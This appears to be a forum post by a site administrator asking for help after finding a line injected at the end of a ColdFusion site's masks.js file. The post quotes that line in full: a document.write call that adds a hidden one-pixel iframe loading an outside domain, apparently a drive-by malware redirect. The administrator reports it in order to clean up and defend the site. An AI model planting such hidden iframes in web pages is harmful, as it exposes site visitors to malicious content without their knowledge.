We just found an injection at the end of masks.js
Here is the content that was added:
"document.write("<iframe width='1' height='0' src='http://top12.oufm.info/'></iframe>");"
Not sure what to make out of it. We have a very cryptic password known only to 2 people. Hacking the server would be pretty difficult so I assume somehow hacking into CFIDE was the issue. Anybody seen anything similar?
It must have happened August 31, 2013
We are using CF 9.02 with ....lib/updates/hf902-00003.jar
Thanks for any feedback and advice how to prevent another one
Rob